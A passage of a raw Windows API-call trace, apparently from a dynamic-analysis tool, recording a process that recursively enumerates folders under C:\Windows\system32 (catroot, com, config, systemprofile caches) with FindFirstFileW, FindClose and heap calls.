lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe4136930, ftCreationTime.dwHighDateTime=0x1cb892a, ftLastAccessTime.dwLowDateTime=0xe4136930, ftLastAccessTime.dwHighDateTime=0x1cb892a, ftLastWriteTime.dwLowDateTime=0x56317e00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-EnterpriseEdition-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIEF23~1.CAT")) returned 1 [0025.947] lstrlenW (lpString="Microsoft-Windows-EnterpriseEdition-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 86 [0025.947] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1188fe7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x1188fe7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x55005100, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x39463e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MID8CB~1.CAT")) returned 1 [0025.947] lstrlenW (lpString="Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 79 [0025.948] lstrlenW (lpString="Microsoft-Windows-Gadget-Platform-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 89 [0025.948] lstrlenW (lpString="Microsoft-Windows-Gadget-Platform-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0025.948] lstrlenW (lpString="Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 85 [0025.948] lstrlenW (lpString="Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 80 [0025.948] lstrlenW (lpString="Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 102 [0025.948] lstrlenW (lpString="Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 97 [0025.948] lstrlenW (lpString="Microsoft-Windows-GroupPolicy-ClientTools-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 97 [0025.948] lstrlenW (lpString="Microsoft-Windows-GroupPolicy-ClientTools-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 92 [0025.948] lstrlenW (lpString="Microsoft-Windows-Help-CoreClientUAPS-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 93 [0025.948] lstrlenW (lpString="Microsoft-Windows-Help-CoreClientUAPS-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 88 [0025.948] lstrlenW (lpString="Microsoft-Windows-Help-CoreClientUAUE-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 93 [0025.948] lstrlenW (lpString="Microsoft-Windows-Help-CoreClientUAUE-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 88 [0025.948] lstrlenW (lpString="Microsoft-Windows-Help-Customization-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 92 [0025.952] FindClose (in: hFindFile=0x5da1b8 | out: hFindFile=0x5da1b8) returned 1 [0025.952] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9f60 | out: hHeap=0x5a0000) returned 1 [0025.952] FindClose (in: hFindFile=0x5ce0d8 | out: hFindFile=0x5ce0d8) returned 1 [0025.952] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8d00 | out: hHeap=0x5a0000) returned 1 [0025.952] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x250) returned 0x5d8d00 [0025.952] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot2\\*", lpFindFileData=0x5d8d00 | out: lpFindFileData=0x5d8d00*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x486905c0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x486905c0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5ce0d8 [0025.952] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\*", lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76ceddac, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76ceddac, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76ceddac, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da1b8 [0025.952] FindClose (in: hFindFile=0x5da1b8 | out: hFindFile=0x5da1b8) returned 1 [0025.952] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9f60 | out: hHeap=0x5a0000) returned 1 [0025.952] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\*", lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84bfae1, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x8851be8, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x8851be8, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da1b8 [0025.952] FindClose (in: hFindFile=0x5da1b8 | out: hFindFile=0x5da1b8) returned 1 [0025.952] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9f60 | out: hHeap=0x5a0000) returned 1 [0025.952] FindClose (in: hFindFile=0x5ce0d8 | out: hFindFile=0x5ce0d8) returned 1 [0025.953] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8d00 | out: hHeap=0x5a0000) returned 1 [0025.953] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\com\\*", lpFindFileData=0x5db390 | out: lpFindFileData=0x5db390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5f9c6, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x1e470555, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e470555, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5ce0d8 [0025.955] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\com\\dmp\\*", lpFindFileData=0x5dc6a0 | out: lpFindFileData=0x5dc6a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xef7f2e, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xa35dd730, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc8f8 [0025.955] FindClose (in: hFindFile=0x5dc8f8 | out: hFindFile=0x5dc8f8) returned 1 [0025.955] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dc6a0 | out: hHeap=0x5a0000) returned 1 [0025.955] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\com\\en-US\\*", lpFindFileData=0x5dc6a0 | out: lpFindFileData=0x5dc6a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e470555, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e470555, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc8f8 [0025.956] FindClose (in: hFindFile=0x5dc8f8 | out: hFindFile=0x5dc8f8) returned 1 [0025.956] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dc6a0 | out: hHeap=0x5a0000) returned 1 [0025.956] FindClose (in: hFindFile=0x5ce0d8 | out: hFindFile=0x5ce0d8) returned 1 [0025.956] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5db390 | out: hHeap=0x5a0000) returned 1 [0025.956] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\*", lpFindFileData=0x5db448 | out: lpFindFileData=0x5db448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xf1e088, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xf1e088, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5ce0d8 [0025.957] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\Journal\\*", lpFindFileData=0x5db6a0 | out: lpFindFileData=0x5db6a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xef7f2e, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xadb261cb, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c, dwReserved1=0x78, cFileName=".", cAlternateFileName="")) returned 0x5db8f8 [0025.957] FindClose (in: hFindFile=0x5db8f8 | out: hFindFile=0x5db8f8) returned 1 [0025.957] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5db6a0 | out: hHeap=0x5a0000) returned 1 [0025.957] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\RegBack\\*", lpFindFileData=0x5db6a0 | out: lpFindFileData=0x5db6a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xef7f2e, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xadb261cb, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c, dwReserved1=0x78, cFileName=".", cAlternateFileName="")) returned 0x5db8f8 [0025.957] FindClose (in: hFindFile=0x5db8f8 | out: hFindFile=0x5db8f8) returned 1 [0025.957] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5db6a0 | out: hHeap=0x5a0000) returned 1 [0025.957] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\*", lpFindFileData=0x5db6a0 | out: lpFindFileData=0x5db6a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xef7f2e, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xef7f2e, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c, dwReserved1=0x78, cFileName=".", cAlternateFileName="")) returned 0x5db8f8 [0025.958] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\*", lpFindFileData=0x5de760 | out: lpFindFileData=0x5de760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x51ab36f5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x51ab36f5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5de9b8 [0025.958] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\*", lpFindFileData=0x5db938 | out: lpFindFileData=0x5db938*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x24a30ea6, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a30ea6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x451f, dwReserved1=0x5dd758, cFileName=".", cAlternateFileName="")) returned 0x5dbb90 [0025.959] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x5e0a08 | out: lpFindFileData=0x5e0a08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a30ea6, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a30ea6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e0c60 [0025.959] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\*", lpFindFileData=0x5dbbd0 | out: lpFindFileData=0x5dbbd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2829382e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x2829382e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x5dbe28 [0025.959] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Caches\\*", lpFindFileData=0x5e2cb0 | out: lpFindFileData=0x5e2cb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2829382e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2829382e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x2829382e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2f08 [0025.960] FindClose (in: hFindFile=0x5e2f08 | out: hFindFile=0x5e2f08) returned 1 [0025.960] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e2cb0 | out: hHeap=0x5a0000) returned 1 [0025.960] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\*", lpFindFileData=0x5dbe68 | out: lpFindFileData=0x5dbe68*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a57006, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a57006, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc0c0 [0025.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*", lpFindFileData=0x5dc100 | out: lpFindFileData=0x5dc100*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24aa32c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24aa32c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x5dc358 [0025.961] FindClose (in: hFindFile=0x5dc358 | out: hFindFile=0x5dc358) returned 1 [0025.961] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dc100 | out: hHeap=0x5a0000) returned 1 [0025.961] FindClose (in: hFindFile=0x5dc0c0 | out: hFindFile=0x5dc0c0) returned 1 [0025.961] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dbe68 | out: hHeap=0x5a0000) returned 1 [0025.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\*", lpFindFileData=0x5dbe68 | out: lpFindFileData=0x5dbe68*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a30ea6, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a30ea6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc0c0 [0025.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x5dc100 | out: lpFindFileData=0x5dc100*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x5dc358 [0025.962] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\0PS72R2M\\*", lpFindFileData=0x5dc398 | out: lpFindFileData=0x5dc398*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a7d166, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x5e4cc0 [0025.962] FindClose (in: hFindFile=0x5e4cc0 | out: hFindFile=0x5e4cc0) returned 1 [0025.962] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dc398 | out: hHeap=0x5a0000) returned 1 [0025.963] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\62AXOPQ5\\*", lpFindFileData=0x5dc398 | out: lpFindFileData=0x5dc398*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a7d166, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x5e4cc0 [0025.963] FindClose (in: hFindFile=0x5e4cc0 | out: hFindFile=0x5e4cc0) returned 1 [0025.963] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dc398 | out: hHeap=0x5a0000) returned 1 [0025.963] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\FZG8CKJ5\\*", lpFindFileData=0x5dc398 | out: lpFindFileData=0x5dc398*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a7d166, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x5e4cc0 [0025.963] FindClose (in: hFindFile=0x5e4cc0 | out: hFindFile=0x5e4cc0) returned 1 [0025.963] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dc398 | out: hHeap=0x5a0000) returned 1 [0025.963] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\LIXMVQOA\\*", lpFindFileData=0x5dc398 | out: lpFindFileData=0x5dc398*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a7d166, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a7d166, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a7d166, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x5e4cc0 [0025.964] FindClose (in: hFindFile=0x5e4cc0 | out: hFindFile=0x5e4cc0) returned 1 [0025.964] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dc398 | out: hHeap=0x5a0000) returned 1 [0025.964] FindClose (in: hFindFile=0x5dc358 | out: hFindFile=0x5dc358) returned 1 [0025.964] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dc100 | out: hHeap=0x5a0000) returned 1 [0025.964] FindClose (in: hFindFile=0x5dc0c0 | out: hFindFile=0x5dc0c0) returned 1 [0025.964] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dbe68 | out: hHeap=0x5a0000) returned 1 [0025.964] FindClose (in: hFindFile=0x5dbe28 | out: hFindFile=0x5dbe28) returned 1 [0025.964] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dbbd0 | out: hHeap=0x5a0000) returned 1 [0025.965] FindClose (in: hFindFile=0x5e0c60 | out: hFindFile=0x5e0c60) returned 1 [0025.965] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e0a08 | out: hHeap=0x5a0000) returned 1 [0025.965] FindClose (in: hFindFile=0x5dbb90 | out: hFindFile=0x5dbb90) returned 1 [0025.965] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5db938 | out: hHeap=0x5a0000) returned 1 [0025.965] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\*", lpFindFileData=0x5db938 | out: lpFindFileData=0x5db938*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x51ab36f5, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x451f, dwReserved1=0x5dd758, cFileName=".", cAlternateFileName="")) returned 0x5dbb90 [0025.965] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x5dbbd0 | out: lpFindFileData=0x5dbbd0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x524ab327, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x5dbe28 [0025.965] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x5dbe68 | out: lpFindFileData=0x5dbe68*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x524ab327, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dc0c0 [0025.965] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x5dc100 | out: lpFindFileData=0x5dc100*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x524ab327, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x5dc358 [0025.966] FindClose (in: hFindFile=0x5dc358 | out: hFindFile=0x5dc358) returned 1 [0025.966] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dc100 | out: hHeap=0x5a0000) returned 1 [0025.966] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x5dc100 | out: lpFindFileData=0x5dc100*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x524ab327, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x5dc358 [0025.967] FindClose (in: hFindFile=0x5dc358 | out: hFindFile=0x5dc358) returned 1 [0025.967] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dc100 | out: hHeap=0x5a0000) returned 1 [0025.967] FindClose (in: hFindFile=0x5dc0c0 | out: hFindFile=0x5dc0c0) returned 1 [0025.967] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dbe68 | out: 